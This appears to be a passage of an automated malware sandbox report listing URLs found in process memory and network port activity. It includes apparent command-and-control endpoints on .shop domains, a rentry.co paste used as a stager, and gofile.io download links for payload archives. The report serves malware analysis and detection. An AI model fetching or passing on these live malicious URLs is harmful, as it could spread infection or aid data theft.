                  Source: explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 0000000E.00000000.1447298084.0000000009390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comWzE
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                  Source: BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                  Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/
                  Source: BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/)
                  Source: BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/1
                  Source: BitLockerToGo.exe, 0000001F.00000003.2451884528.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2451637536.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2457471524.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/BC
                  Source: BitLockerToGo.exe, 0000001F.00000003.2451637536.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/api
                  Source: BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/api1
                  Source: BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/b
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                  Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comE
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                  Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2776009406.0000000003144000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710158807.000000000313E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2741303934.0000000003128000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2885932416.000000000065F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2715297598.0000000003144000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2885932416.000000000067D000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2713680511.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/
                  Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/8
                  Source: lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/_
                  Source: lm.exe, 00000026.00000003.2682127976.000000000313A000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2731047551.0000000000670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/api
                  Source: lm.exe, 00000026.00000003.2846410742.000000000313E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/api(
                  Source: lm.exe, 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/api4
                  Source: lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/apiXvg
                  Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/fD
                  Source: lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop/g
                  Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://liernessfornicsa.shop:443/api
                  Source: IXDaI.exe, 00000005.00000002.1466246003.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNaP0B
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000CFF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberZ
                  Source: 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
                  Source: 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/mi
                  Source: 753F.exe, 0000001C.00000002.2708165528.000001C080318000.00000004.00000800.00020000.00000000.sdmp, 753F.exe, 0000001C.00000002.2708165528.000001C080267000.00000004.00000800.00020000.00000000.sdmp, 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/microgods/raw
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store4.gofile.io
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.28.drString found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
                  Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.28.drString found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
                  Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000000E.00000000.1447862980.0000000009730000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                  Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com576
                  Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                  Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                  Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                  Source: BitLockerToGo.exe, 0000001F.00000003.2407694524.0000000005563000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: BitLockerToGo.exe, 0000001F.00000003.2407694524.0000000005563000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: SciTE.exe.5.drString found in binary or memory: https://www.smartsharesystems.com/
                  Source: SciTE.exe.5.drString found in binary or memory: https://www.smartsharesystems.com/Morten
                  Source: 753F.exe.14.drString found in binary or memory: https://www.ssl.com/repository0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
